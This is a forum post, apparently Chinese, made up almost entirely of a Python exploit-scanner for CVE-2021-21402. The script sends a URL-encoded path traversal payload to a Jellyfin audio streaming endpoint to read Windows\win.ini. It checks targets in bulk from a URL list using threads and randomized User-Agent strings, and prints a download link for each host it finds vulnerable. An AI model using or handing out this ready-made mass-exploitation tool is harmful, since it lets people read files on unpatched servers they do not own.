- 注册
- 09 10, 2024
- 消息
- 186
Python:
import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]
#随机ua
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
os_type = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
#获取版本信息
def check_vuln(url):
url = parse.urlparse(url)
url1 = url.scheme + '://' + url.netloc
url2 = url.scheme + '://' + url.netloc + '/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/'
try:
headers = {'User-Agent': get_ua()}
res = requests.get(url2,headers=headers,timeout=10,verify=False)
if res.status_code == 200 and "font" in res.text and "file" in res.text:
print("\033[32m[+]%s is vulnerable\nDownload link:%s\033[0m" %(url1,url2))
else:
print("\033[31m[-]%s is no vulnerable\033[0m" %url1)
except Exception as e:
print ("[-]%s is timeout\033[0m" %url1)
#多线程
def multithreading(url_list, pools=5):
works = []
for i in url_list:
# works.append((func_params, None))
works.append(i)
# print(works)
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(check_vuln, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
if __name__ == '__main__':
show = r'''
_____ _ _ _____ _____ _____ _____ __ _____ __ ___ _____ _____
/ __ \ | | | ___| / __ \| _ |/ __ \/ | / __ \/ | / | _ |/ __ \
| / \/ | | | |__ ______`' / /'| |/' |`' / /'`| |______`' / /'`| | / /| | |/' |`' / /'
| | | | | | __|______| / / | /| | / / | |______| / / | |/ /_| | /| | / /
| \__/\ \_/ / |___ ./ /___\ |_/ /./ /____| |_ ./ /____| |\___ \ |_/ /./ /___
\____/\___/\____/ \_____/ \___/ \_____/\___/ \_____/\___/ |_/\___/ \_____/
CVE-2021-21402 By m2
'''
print(show + '\n')
arg=ArgumentParser(description='CVE-2021-21402 By m2')
arg.add_argument("-u",
"--url",
help="Target URL; Example:http://ip:port")
arg.add_argument("-f",
"--file",
help="Target URL; Example:url.txt")
args=arg.parse_args()
url=args.url
filename=args.file
start=time()
if url != None and filename == None:
check_vuln(url)
elif url == None and filename != None:
for i in open(filename):
i=i.replace('\n','')
url_list.append(i)
multithreading(url_list,10)
end=time()
print('任务完成,用时%d' %(end-start))
